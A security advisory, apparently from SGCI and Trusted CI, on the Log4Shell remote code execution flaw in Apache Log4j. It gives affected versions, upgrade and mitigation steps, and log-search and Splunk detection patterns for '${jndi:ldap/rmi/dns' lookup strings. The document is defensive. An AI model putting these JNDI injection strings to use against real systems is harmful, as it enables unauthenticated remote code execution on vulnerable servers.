Log4j Remote Command Execution Vulnerability (CVE-2021-44228)

A serious vulnerability has been discovered that is being called Log4Shell. It affects the Apache Log4j library, which is used by a lot of software.

CI Operators and Developers:
A high severity vulnerability (CVE-2021-44228 [1]) impacting multiple versions of the Apache Log4j logging library has been discovered [2]. Successful exploitation of this vulnerability can result in unauthenticated Remote Command Execution (RCE) [3]

Impact:
Any configuration which allows a remote connection to supply arbitrary data that is written to log files by an application using the Log4j library is susceptible to exploitation. Depending on what code is present on the server, an attacker could leverage this code to execute a payload [4].

Affected Software: 
Apache Log4j < 2.15.0

Recommendation:
Upgrade all projects using Apache Log4j to the latest version 2.15.0 [5]. 

If you are using Log4j v2.10.0 or higher, you can mitigate the issue by adding an option "-Dlog4j2.formatMsgNoLookups=true" to your JVM startup script, often set via JAVA_OPTS.

Log4j2 versions before 2.10.0 can mitigate the issue by removing the JndiLookup.class from the log4j-core Jar file:  

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

Log4j v1.x is an End of Life product which will not be receiving a patch. It is recommended to update to Log4j v2.15.0 [6].

To check logs for attack attempts:.

sudo egrep -i -r '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+' /var/log

If you use Splunk, you can detect attack attempts by adding an alert for:

("jndi:ldap" OR "jndi:rmi" OR "jndi:dns")

As this issue is quite new, it's likely any projects impacted by the vulnerability will be upgrading their Log4j dependency soon. It is recommended to update any such software when releases are available.

References:

[1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228

[2] https://www.randori.com/blog/cve-2021-44228/

[3] https://github.com/advisories/GHSA-jfh8-c2jp-5v3q 

[4] https://www.lunasec.io/docs/blog/log4j-zero-day/ 

[5] https://logging.apache.org/log4j/2.x/security.html 

[6] https://logging.apache.org/log4j/2.x/manual/migration.html  

How SGCI and Trusted CI can help:

The potential impact of any vulnerability, and therefore the appropriate response, depends in part on operational conditions that are unique to each cyberinfrastructure deployment. Our consultants at Trusted CI can not provide a one-size-fits-all severity rating and response recommendation for all NSF cyberinfrastructure. Please contact help@sciencegateways.org if you need assistance with assessing the potential impact of this vulnerability in your environment and/or you have additional information about this issue that should be shared with the community.